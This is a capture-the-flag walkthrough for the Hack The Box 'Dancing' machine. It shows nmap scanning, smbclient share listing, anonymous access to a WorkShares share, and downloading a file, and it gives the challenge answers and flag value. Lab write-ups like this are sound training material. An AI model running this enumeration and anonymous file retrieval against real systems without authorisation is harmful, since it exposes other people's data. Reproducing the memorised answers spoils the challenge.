Solving HTB Dancing CTF — A Step-by-Step Guide
In this article, we will walk through the process of solving the HTB CTF challenge “Dancing.” We’ll explore the various steps involved in uncovering the necessary information and executing the required commands to obtain the root flag. So, let’s dive in and solve this challenge together!
What does the 3-letter acronym SMB stand for?
Server Message BlockServer Message Block (SMB) is a network protocol used for sharing files, printers, and other resources between computers on a network.
What port does SMB use to operate at?
445Port 445 is the default port used by SMB for communication. It allows devices to establish connections and share resources over a network.
What is the service name for port 445 that came up in our Nmap scan?
nmap -sV 10.129.75.93
Starting Nmap 7.94 ( <https://nmap.org> ) at 2023-06-28 15:36 +03
Nmap scan report for 10.129.75.93
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.40 secondsWhen conducting a network scan using tools like Nmap, the service name for a specific port can provide information about the associated service. In this case, “microsoft-ds” indicates that port 445 is associated with Microsoft Directory Services, which includes SMB functionality.
What is the ‘flag’ or ‘switch’ we can use with the SMB tool to ‘list’ the contents of the share?
-LBy using the
-Lflag with the SMB tool, such as smbclient, we can list the available shares on a remote system. This allows us to view the shared resources and gain insights into the file structure.
How many shares are there on Dancing?
smbclient -L 10.129.75.93
Password for [WORKGROUP\\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.75.93 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableBy running the command
smbclient -L 10.129.75.93(replace the IP address with the target IP), we can retrieve the list of available shares on the target machine. In the output, you will find the names and types of shares, including “ADMIN$”, “C$”, “IPC$” , and “WorkShares”.
What is the name of the share we are able to access in the end with a blank password?
WorkSharesAfter authenticating with a blank password using the
smbclientcommand, we can navigate to the “WorkShares” share and access its contents. This share is accessible without requiring a password, providing us with an entry point to explore further.
What is the command we can use within the SMB shell to download the files we find?
getOnce we have accessed the desired share within the SMB shell, we can use the
getcommand to download files. For example, by navigating to a specific directory using thecdcommand, we can useget <file name>“ to download a file named “filename” from the remote system to our local machine.
Submit root flag
smbclient \\\\\\\\10.129.75.93\\\\WorkShares
Password for [WORKGROUP\\root]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Mon Mar 29 11:22:01 2021
.. D 0 Mon Mar 29 11:22:01 2021
Amy.J D 0 Mon Mar 29 12:08:24 2021
James.P D 0 Thu Jun 3 11:38:03 2021
5114111 blocks of size 4096. 1748938 blocks available
smb: \\> cd James.P
smb: \\James.P\\> ls
. D 0 Thu Jun 3 11:38:03 2021
.. D 0 Thu Jun 3 11:38:03 2021
flag.txt A 32 Mon Mar 29 12:26:57 2021
5114111 blocks of size 4096. 1748938 blocks available
smb: \\James.P\\> get flag.txt
getting file \\James.P\\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
# cat flag.txt
5f61c10dffbc77a704d76016a22f1664After successfully navigating to the “WorkShares” share and exploring its contents, we discover a file named “flag.txt” within the “James.P” directory. By using the
get flag.txtcommand, we can download the file, which contains the root flag for the CTF challenge.
In this article, we explored the process of solving the Dancing CTF challenge from Hack The Box. By understanding the concepts behind SMB, using the appropriate commands, and leveraging the smbclient tool, we were able to enumerate shares, access them, and retrieve the root flag. CTF challenges like this help enhance our skills in network enumeration, file sharing protocols, and command-line tools, contributing to our overall knowledge in cybersecurity and penetration testing.
